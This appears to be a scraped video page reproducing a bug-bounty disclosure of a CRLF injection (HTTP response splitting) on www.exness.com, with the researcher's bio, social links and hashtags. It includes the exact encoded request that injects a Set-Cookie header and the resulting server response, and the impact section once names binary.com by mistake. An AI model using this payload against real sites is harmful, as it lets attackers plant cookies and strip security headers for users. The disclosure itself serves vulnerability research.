Скачать или смотреть $200 Bounty - CRLF Injection - Http Response Splitting | www.exness.com |

CRLF Injection - Http Response Splitting


Description:
Summary:
The vulnerability is a classic HTTP header injection. By making the following HTTP request it's possible to inject additional HTTP headers:
Steps to Reproduce:
The issue can be reproduced by following these easy steps.
1) Make a get request to the target URL. - https://exness.com with payload.


Request
Code 263 Bytes
GET /%0Aset-cookie:%20hello=how;%0Aevil=evil; HTTP/2
Host: www.exness.com
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36


This HTTP request will produce the following response:


Code 314 Bytes
HTTP/2 301 Moved Permanently
Date: Wed, 16 Mar 2022 22:15:24 GMT
Content-Type: text/html
Server: nginx/1.17.8
Location: /
Set-Cookie: hello=how;
Evil=evil;/:

Supporting Material/References:
HTTP_HEADER_SPLITTING.mp4
Impact:
Since this attack doesn't require any user interaction to be exploited, a attack could do lots of things using this vulnerability by including a malicious url.etc.

As the example shows the attacker can set cookies for the user on binary.com
The attacker can disable or bypass security headers placed by the server

One restriction the attacker has is that the request is a redirect. This made it for me impossible to XSS attacks or Cache Poisoning. Maybe you guys could look a bit into this further. However i would argue that because of the fact user interaction is not needed and the fact that the attacker can set his own headers (including cookies) the attack is fairly scary.

All the videos are only for educational purpose.
#mufazmi


I'm Umair Farooqui, a passionate software engineer and security researcher dedicated to uncovering vulnerabilities in systems worldwide. With a strong background in ethical hacking, I delve into the intricacies of cybersecurity to safeguard digital infrastructures.

🔍 Hacking Experience:

I specialize in discovering and responsibly disclosing critical security issues. My portfolio includes successful hacks and disclosures impacting renowned organizations such as NASA and Paytm, earning recognition and appreciation for enhancing their security postures.

🎥 YouTube Channel:

On my YouTube channel, I share Proof of Concept (PoC) videos where I demonstrate how vulnerabilities were identified and exploited. Each video provides insights into the techniques used and the impact on security.

🌐 Connect with Me:
GitHub: https://github.com/mufazmi
Instagram:   / mufazmi  
Twitter:   / mufazmi  
HackerOne: https://hackerone.com/mufazmi
Bugcrowd: https://bugcrowd.com/mufazmi
Google Search: https://www.google.com/search?q=Umair...
Google Search: https://www.google.com/search?q=mufazmi

📱 Contact Me:
WhatsApp: +91 9867503256

Note: All content shared on this channel is for educational purposes only.

🔗 Hashtags:
#mufazmi #umairfarooqui #ethicalhacking #cybersecurity #infosec #bugbounty #securityresearch #hacker #bughunter #websecurity #pentesting #vulnerability #exploit #securityawareness #tech #coding #opensource #privacy #datasecurity #cybercrime #networksecurity #cyberattack #digitalforensics #blockchainsecurity #iotsecurity #appsec #cloudsecurity #redteam #blueteam #hackerinmumbra #mumbra #mumbrahacker #hackerkausa #mumbrahacker #itpm #hackerinsaraimeer #saraimeerhacker #saraimeer

Join me in exploring the world of cybersecurity, one vulnerability at a time! Let's secure the digital landscape together. 💻🛡️